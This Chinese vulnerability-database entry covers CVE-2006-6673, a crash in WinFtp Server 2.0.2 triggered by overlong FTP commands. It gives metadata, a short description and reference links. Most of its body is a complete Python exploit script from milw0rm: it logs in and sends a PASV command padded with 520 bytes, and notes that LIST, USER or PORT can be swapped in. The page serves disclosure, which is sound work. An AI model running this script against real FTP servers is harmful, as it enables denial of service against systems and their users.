WinFtp Server 长命令拒绝服务攻击

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111802 漏洞类型 未知
发布时间 2006-12-19 更新时间 2006-12-20
CVE编号 CVE-2006-6673 CNNVD-ID CNNVD-200612-446
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2952
https://www.securityfocus.com/bid/87242
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-446
|漏洞详情
WinFtpServer2.0.2远程攻击者通过长(1)PASV,(2)LIST,(3)USER,(4)PORT和可能的其他命令来发起拒绝服务攻击(崩溃)。
|漏洞EXP
import sys,os,string
import socket
import struct
import time

print "-----------------------------------------------------------------------"
print "# WinFtp Server Version 2.0.2 Denial of Service"
print "# url: http://www.wftpserver.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot[org]"
print "# site: http://shinnai.altervista.org"
print "# soundtrack: Territorial pissing (by Nirvana)"
print "# you can choose one of all ftp commands implemented :)"
print "-----------------------------------------------------------------------"



buffer = "A" * 520
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",21))
except:
   print "- Unable to connect. exiting."

d = s.recv(1024)
time.sleep(2)
s.send('USER %s\r\n' % "test")
time.sleep(2)
s.send('PASS %s\r\n' % "test")
time.sleep(2)
s.send('PASV %s\r\n' % buffer) #You can change PASV with LIST, USER, PORT, etc...
time.sleep(2)

# milw0rm.com [2006-12-19]
|受影响的产品
Winftp Server Winftp Server 2.0.2
|参考资料

来源:MILW0RM
名称:2952
链接:http://www.milw0rm.com/exploits/2952
来源:VUPEN
名称:ADV-2006-5069
链接:http://www.frsirt.com/english/advisories/2006/5069
来源:SECUNIA
名称:23412
链接:http://secunia.com/advisories/23412
来源:MILW0RM
名称:2952
链接:http://milw0rm.com/exploits/2952